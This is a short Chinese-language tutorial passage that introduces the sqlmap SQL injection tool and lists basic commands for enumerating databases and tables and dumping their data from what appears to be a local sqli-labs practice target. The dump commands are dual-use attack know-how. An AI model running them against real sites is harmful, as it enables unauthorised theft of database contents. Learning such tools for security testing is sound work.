sqlmap是一款开源的目动化SQL注入检测与利用工具,使用Python语言编写。它能够自动识别和利用Web应用程序中的SQL注入漏洞,支持多种数据库类型(如MySQL、OraclePostgreSQL等)和广泛的注入技术。安全测试人员常用它来检测网站的安全性。
执行命令sqlmap -u http://192.168.110.157/sqli/Less-1/?id=1(基础的url)。 --dbs获取所有的数据库。 -D +指定库名 --tables 获取所有表名。 -T指定表名 --dump导出所有数据。
